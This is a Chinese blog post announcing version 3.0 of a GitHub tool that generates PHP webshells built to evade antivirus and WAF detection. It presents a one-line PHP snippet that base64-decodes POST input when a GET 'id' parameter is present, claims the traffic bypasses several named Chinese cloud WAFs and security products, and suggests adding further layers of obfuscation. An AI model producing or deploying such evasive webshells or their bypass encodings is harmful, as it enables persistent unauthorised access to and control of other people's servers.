前言
我承诺过300个星后放出3.0
项目地址:
https://github.com/yzddmr6/webshell-venom
webshell-venom 3.0 更新特点:
1. 修复已知问题:宝塔在遇到header404时会解析到他的404模版上而不是shell上导致无法连接,故去除头部的404,如有需要自行添加
2. 变量全员随机化,不再有固定的变量名称
3. 增加流量传输编码方式并且兼容原版
4. 免杀依旧,自己扫两遍就知道了
流量编码原理及使用方式:
看了很多文章甚至包括蚁剑的编码器demo里面都是用一些特定的shell来base64或者hex或者gzin的方式来绕过各种waf的流量检测
但是问题就是不兼容,麻烦,还要上不同的马
并且不好做维护,因为你的特定shell一旦成为已知样本后就相当于完全gg
3.0就解决了这个问题
其实原理很简单,就是如下的一行代码:
isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
如果存在id这个get的参数就把post的数据base64解密一遍
否则就直接传参
也就是说我们只要使用的时候不加id这个参数就能像一般的shell使用
需要过流量检测的时候就加个id=xxx
后面的xxx不固定,也是为了增加随机化
使用实例:
image
生成测试文件test.php
直接明文post
image
加入id参数后base64传参
image
用蚁剑连接的话就用官方的base64_bypass编码器
抓个流量
image
后言
经过测试把参数全部base64后可以绕过某里云 某锁 某狗 某塔,基本上够用了
如果想要gzin或者hex传输请自己修改
base64只是个参考如果觉得一层不够可以多加几层混淆
这个就需要你自己动手了
最后的最后
更新免杀不易,且用且珍惜
还请大家多多支持
网友评论